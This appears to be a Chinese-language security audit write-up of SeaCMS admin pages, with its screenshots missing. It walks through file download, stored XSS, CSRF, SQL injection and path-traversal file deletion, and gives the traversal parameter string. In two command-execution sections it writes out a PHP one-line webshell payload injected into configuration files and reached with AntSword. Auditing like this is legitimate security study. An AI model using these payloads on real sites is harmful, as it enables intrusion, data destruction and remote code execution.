任意檔案下載下傳:
代碼審計:
通過定位file_get_contents()函數:
找尋有可控變量的檔案:
背景檔案/n5y4um/admin_safe.php,代碼94行。
漏洞複現:
進入背景這個頁面:
XSS:
因為已經登入背景,是以找存儲型的XSS,在擴充中添加廣告,友情連結這些地方進行嘗試:
直接修改海洋cms名稱,拼接js,
存儲型XSS:
前台頁面:
CSRF:
嘗試添加系統管理者:
構造poc:
在另一浏覽器打開:
任意檔案删除
代碼審計:
網頁打開admin_template.php,添加參數action=del&filedir=../templets/default/html/../../../test.php。設定打開這個網頁就進行自動斷點。在 admin_template.php進行跟蹤:
未對删除目錄路徑進行嚴格的過濾,會存在路徑穿越進行删除任意檔案。
漏洞複現:
在背景模闆頁面
點選下一級目錄。
自己在根目錄添加一個test.php檔案,将最後的檔案名改為根目錄下自己建立的檔案路徑。
發現根目錄下自己設定的test.php檔案删除成功。說明存在任意檔案删除漏洞。
頁面上顯示的内容為根目錄下的檔案。會傳回抓包修改的的路徑。
指令執行:
在背景百度推送頁面:
進入這個檔案檢視:
向上檢視這兩個參數:打開/data/admin/ping.php檔案:
打開/data/admin/ping.php檔案:
是以頁面中插入一句話木馬:";eval($_REQUEST[6]);//
檢視檔案中代碼:
通路這個頁面:
連接配接蟻劍即可。
指令執行2:
在背景使用者-->會員消息通知:
成功儲存之後:
去檔案中檢視出現的問題:
再次嘗試 ";eval($_REQUEST[6]);// :
木馬上傳成功:
通路這個檔案:
SQL注入:
代碼審計
在/背景檔案夾/admin_comment_news.php檔案。
追蹤這兩個函數:
未發現進行過濾,存在SQL注入。